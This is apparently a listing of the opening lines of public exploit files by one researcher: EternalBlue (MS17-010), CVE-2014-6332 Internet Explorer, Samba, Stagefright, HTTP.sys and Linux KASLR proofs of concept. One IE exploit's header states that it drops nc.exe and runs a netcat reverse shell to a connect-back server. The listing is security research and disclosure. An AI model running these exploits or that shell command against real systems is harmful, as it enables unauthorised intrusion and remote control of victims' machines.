worawit

# This file has no update anymore. Please see https://github.com/worawit/MS17-010
import sys
from struct import pack

if len(sys.argv) < 4:
	print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
	sys.exit()

sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()

worawit

<html>
<head>
<!--
CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode
- Tested on IE11 + Windows 7 64-bit

References:
- original PoC - http://www.exploit-db.com/exploits/35229/
- http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
- http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html

worawit

#!/usr/bin/python
"""
PoC for Samba vulnerabilty (CVE-2015-0240) by sleepya
This PoC does only triggering the bug

Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/

#################
Exploitability against CentOS/Ubuntu binaries

worawit

<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target

Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windoes 8.1 64-bit (EPM is off)

worawit

#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket

'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

worawit

/*
 * reversed SafeArrayRedim() in oldaut32.dll (Windows XP)
 * for CVE-2014-6332
 */

typedef struct tagSAFEARRAY 
{
	USHORT         cDims;         // number of dimensions
	USHORT         fFeatures;     // type of elements
	ULONG          cbElements;    // byte size per element

worawit

#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket

'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

worawit

#!/usr/bin/python

"""
Stagefright PoC for https://android.googlesource.com/platform/frameworks/av/+/2b50b7aa7d16014ccf35db7a7b4b5e84f7b4027c
"""
from struct import pack

def create_box(atom_type, data):
    return pack("!I", len(data)+4+4) + atom_type + data

worawit

/*
Pseudo code in HTTP.sys to understand flow related to MS15-034

All pseudo code are reversed from vulnerable HTTP.sys on Windows 7 SP1 x86

For anyone want to know what function are patched.
Just open patched version and find all functions reference to RtlULongLongAdd().
*/

worawit

/*
This PoC is based on http://www.immunityinc.com/downloads/x86leaks_old.pdf

The PoC finds direct physical map and kernel text address in Linux kernel without PTI on Intel x64.

The PoC might not work correctly in VM. For example, this PoC cannot find correct direct physical map
address in KVM. The reason is in https://www.kernel.org/doc/Documentation/virtual/kvm/mmu.txt


$ ./break_linux_kaslr_nopti